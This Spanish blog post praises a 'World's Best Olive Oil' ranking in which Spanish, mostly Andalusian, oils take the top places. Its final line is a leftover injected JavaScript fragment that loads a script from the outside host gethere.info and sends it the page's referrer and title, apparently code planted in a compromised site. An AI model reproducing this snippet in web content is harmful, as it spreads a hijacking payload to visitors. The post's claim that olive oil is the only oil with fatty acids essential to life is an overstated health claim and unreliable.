Los mejores aceites de oliva virgen del mundo

05/12/2016

Aceite Oliva Virgen Extra Nueva Campaña 12-13

Que el aceite de oliva virgen extra está más de moda que nunca todos lo sabemos. Que su sabor es único y excepcional también, siendo su uso en la cocina del siglo XXI decisivo. Y que sus propiedades son incluso beneficiosas para nuestra salud también: es el único aceite del mundo que posee los ácidos grasos fundamentales para la vida humana.

Pero tal vez no todos sepamos que el pasado mes de septiembre se publicaron los mejores aceites de oliva virgen extra. 50 en total son los aceites que forman parte de la llamada lista World’s Best Olive Oil. Pues bien, de estos 50 aceites, 37 son españoles. Más os contamos, los cinco primeros puestos han recaído en cinco productos españoles. Nada más y nada menos. Y, coincidencias de la vida, o señal de que nuestra Andalucía es toda una experta en estos menesteres, la mayoría son andaluces. ¡Es más! Los tres primeros de la lista, que os enumeramos a continuación, son cordobeses. ¿No creéis qué esta puede ser otra buena excusa para escaparnos a Córdoba?:

  1. Aceite de Oliva virgen extra Venta del Barón.
  2. Parque Oliva serie Oro.
  3. Aceite Morellana.

Sin quitarnos mérito alguno, y sabiendo que solo en España tenemos hasta 660 variantes de aceituna, es lógico que nuestros aceites triunfen: picual, hojiblanca, cornicabra, empeltre, etc. Cada aceituna confiere unos sabores y matices únicos a los distintos aceites que con ellas se van elaborando.

El experto Santiago Muguiro describe nuestro aceite con estas tres palabras: paisaje, salud y tradición. Nada más acertado, ¿verdad? Viva nuestro aceite. Vivan los mejores aceites del mundo. Y viva Andalucía, la cuna de estos aceites 😉 .

Foto | iloveaceite aceite de oliva

s.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + »;